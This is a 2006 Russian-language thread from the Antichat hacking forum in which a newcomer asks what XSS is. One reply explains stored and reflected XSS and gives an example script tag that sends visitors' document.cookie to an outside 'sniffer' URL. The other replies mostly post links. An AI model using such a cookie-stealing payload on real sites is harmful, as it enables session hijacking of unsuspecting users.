ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Что такое ксс, и с чем его едят?
  #1  
Старый 22.09.2006, 14:45
Аватар для MC_Brute
MC_Brute
Познающий
Регистрация: 15.09.2006
Сообщений: 36
Провел на форуме:
324272

Репутация: 28
Отправить сообщение для MC_Brute с помощью ICQ
По умолчанию Что такое ксс, и с чем его едят?

Думаю из названия понятно. Надеюсь на вашу помощь!
 

  #2  
Старый 22.09.2006, 14:58
Аватар для Ksander
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

Если коротко, то

XSS(активные и пассивные)

Уязвимости класса xss в сущности сводятся к тому, что пользователь может внедрить в страницу произвольный html-код. Это может случиться если фильтрация вводимых символов организованна некорректно(или её вопще нет).
Часто подобные аттаки организуются через любые поля ввода.Эти уязвимости делятся на две подкатегории: активный xss и пассивный xss.
Ативный xss-исполнение html кода, без "активных" действий пользователя. На примере форума: плохой программист не позаботился о фильтрации html тегов,
тогда злой дядька пишет сообщение
"Привет, какой классный у вас форум <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>"
в результате просмотра этого сообщения пользователем его cookie "уплывут" на "сниффер".
Перейдём к пассивному XSS. Отличается от активного он тем, что для успешного проведения атаки пользователь должен пройти по специально составленной, предложенной ему ссылке, ведущей куда-либо на том же сайте откуда мы хотим увести куки. Обычно для такой атаки используются адресная строка браузера,поле search(работающее методом get),либо фрейм.





Вот тебе ссылка, почитай, там все подробно написано http://www.webfile.ru/1117230

Вот еще http://paradox.3bb.ru/viewtopic.php?pid=43

p.s.а самая главная ссылка это вот

http://www.google.com.ua/search?hl=uk&ie=windows-1251&q=%C2%F1%E5+%EE+XSS&meta=

и

www.google.com\ru\ua
www.ya.ru
www.rambler.ru
www.aport.ru

Последний раз редактировалось Ksander; 22.09.2006 в 16:12..
 

  #3  
Старый 22.09.2006, 16:05
Аватар для BlackDog
BlackDog
Познающий
Регистрация: 05.07.2006
Сообщений: 93
Провел на форуме:
260548

Репутация: 18
Отправить сообщение для BlackDog с помощью ICQ
По умолчанию

Rtfm!



======

Пока устный выговор. Впредь пиши по сути дела

DRON-ANARCHY

Последний раз редактировалось DRON-ANARCHY; 22.09.2006 в 16:56..
 

  #4  
Старый 22.09.2006, 18:36
Аватар для Kaban
Kaban
Участник форума
Регистрация: 19.03.2006
Сообщений: 286
Провел на форуме:
2547059

Репутация: 144
По умолчанию

вот ссылки на статьи:
http://www.forum.antichat.ru/thread11807.html

http://antichat.ru/crackchat/HTML/

http://forum.antichat.ru/thread20140.html

читай и учи!!! =)
 

  #5  
Старый 23.09.2006, 01:34
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

да, и еще одна:
http://www2.packetstormsecurity.org

Практика - Лучший учитель...имхо
 

  #6  
Старый 23.09.2006, 18:43
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

Если я тебя правельно понял, то вот http://www.w3.org/Style/CSS/

А редактировать CSS можно с помощью "офисной утилиты" FrontPage

Ну а если не правельно, то х с ним.
 

  #7  
Старый 23.09.2006, 23:52
Аватар для Digimortal
Digimortal
Banned
Регистрация: 22.08.2006
Сообщений: 608
Провел на форуме:
6144796

Репутация: 1095


Smile

Цитата:
Сообщение от max_pain89  
Если я тебя правельно понял, то вот http://www.w3.org/Style/CSS/

А редактировать CSS можно с помощью "офисной утилиты" FrontPage

Ну а если не правельно, то х с ним.
Наверно все-таки неправильно...

Если вопрос по каск. таблицам - то это не в тот раздел тема (да и вообще, не в тот форум...)
 

  #8  
Старый 23.09.2006, 23:58
Аватар для .Slip
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

На вопрос ответили с избытком. Привели много ссылок. Теперь только читать и понимать, а тут уже помочь никак. Тема закрыта.
ЗЫ Если будет очень уж большая неоюходимость здесь отпостить, пишите в ПМ, тему открою
__________________
..

Последний раз редактировалось [sL1p]; 24.09.2006 в 00:03..
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Сексуальные новости 2003 года Рогатый Трупоед Болталка 9 23.10.2007 00:24
Что такое Phreaking и с чем его едят silveran Электроника и Фрикинг 2 20.08.2006 08:49
SQL injection в MySql сервере версии 3,x bandera Чужие Статьи 3 04.06.2006 16:17
Что такое 3g? novichok Сотовый фрикинг 0 07.04.2006 20:06
МнеВеликие перцы svans Чаты 11 24.12.2002 18:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ